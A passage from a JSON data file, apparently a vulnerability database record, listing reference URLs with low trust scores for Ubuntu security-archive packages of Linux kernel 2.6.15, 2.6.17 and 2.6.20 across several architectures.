        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc-smp_2.6.15-29.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.32.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc-smp_2.6.15-29.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-k7_2.6.15-29.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-686_2.6.15-29.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-k8_2.6.15-29.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-686_2.6.15-29.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
